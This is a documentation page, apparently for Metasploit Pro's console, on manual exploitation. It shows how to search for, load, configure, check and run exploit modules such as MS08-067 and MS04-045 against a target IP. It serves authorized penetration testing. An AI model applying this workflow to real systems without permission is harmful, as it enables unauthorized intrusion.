Manual Exploitation
Copy link

An exploit is a program that takes advantage of a specific vulnerability and provides an attacker with access to the target system. An exploit typically carries a payload and delivers it to the target system. The most common types of exploit modules are buffer overflow and SQL injection exploits.

To manually run an exploit, you must choose and configure an exploit module to run against a target. You choose the exploit module based on the information you have gathered about the host. For example, if you know that the target is missing the MS08-067 patch and has port 445/139 open, you can run the MS08-067 exploit to attempt exploitation. Module Search Before you can configure and run an exploit, you need to search for the module. The console includes the ability to search for modules using search operators.

You use search operators to create a query based on a specific module name, path, platform, author, CVE ID, BID, OSDVB ID, module type, or application. The search returns a list of results that match the query.

The following are search operators that are available:

  • name
  • path
  • platform
  • type
  • app
  • author
  • cve
  • bid
  • osdvb

Search Syntax
Copy link

To search for a module, use the following syntax:

$ search <search operator>:<search term>

Searching for a Module
Copy link

Use the search command along with the search operator to search for a module

msf-pro > search platform:Windows
msf-pro > search type:exploit
msf-pro > search author:hd
msf-pro > search app:client
msf-pro > search name:ms08-067

Showing All Exploit Modules
Copy link

Use the show command to view a list of the exploits that are available.

msf-pro > show exploits
ℹ️

This can take a few minutes. There are thousands of modules.

Loading a Module Use the use command to load an exploit module. After you issue the use command, the Metasploit Console changes the command prompt to show the loaded module.

msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) >
ℹ️

You can use the Tab key to complete the module path.

Resetting the Current Module Context Use the back command to reset the prompt and to remove the module that is currently loaded.

msf-pro exploit (ms04_045_wins) > back
msf-pro >

Showing Options for a Module Use the show command to view a list of options that are available for a particular module.

msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show options

Show Required Options After an exploit is loaded, you need to set all the required options. To find out what options are required, you can use the show missing command.

msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show missing

Showing Advanced Options for a Module Use the show command to view a list of advanced options that are available for an exploit module.

msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show advanced

Setting Options for a Module Use the set command to configure options for a module. You need to specify the option name and the option value, as shown below:

msf-pro exploit (ms04_045_wins) > show options
 
Name Current Setting Required Description
---- ------- ------- -------- ------------
RHOST
RPORT 445
 
msf-pro exploit (ms04_045_wins) > set RHOST 192.168.55.1

Showing the Targets for a Module Use the show targets command to view a list of potentially vulnerable targets. Most modules display a list of targets that may be vulnerable to the exploit. Each target has an ID and operating system.

If you know the victim machine’s operating system and version, you can specify the target for the exploit. Some modules provide an automatic targeting option. If you are unsure of the operating system or version, you can use the automatic targeting option if it is available, to automatically detect the victim machine’s OS and version.

msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show targets
 
Exploit targets:
Id Name
-- -----
0 Windows 2000 English

Check to See if a Target is Vulnerable Most exploits are version specific. For example, ms14_012_textrange is an exploit for Internet Explorer 9, but only works against versions of IE9 that were built between July 2013 to February 2014. To use this exploit, you would need to know the exact MSHTML build the target is using.

This is where the check command becomes very handy. You can use the check command to determine if a target is vulnerable to a particular exploit.

msf-pro > use exploit/windows/smb/ms08_067_netapi
msf-pro exploit (ms08_067_netapi) > check 192.168.55.1
[+] 192.168.55.1:445 - the target is vulnerable.
⚠️

Not all modules support the check command.

Setting the Target for an Exploit Use the set target command to specify a target for the exploit.

msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show targets
 
Exploit targets:
Id Name
-- -----
0 Windows 2000 English
 
msf-pro exploit (ms04_045_wins) > set target 0

Running an Exploit Module Use the exploit or run command to run an exploit module.

msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > run

Resetting the Current Module Context Use the back command to reset the command prompt and to remove the module that is currently loaded.

msf-pro exploit (ms04_045_wins) > back
msf-pro >

Reloading an Exploit Use the reload command to refresh the metadata and methods for an exploit. This command is handy if you’ve edited the module while in the module context and need to update the module.

msf-pro exploit (ms04_045_wins) > reload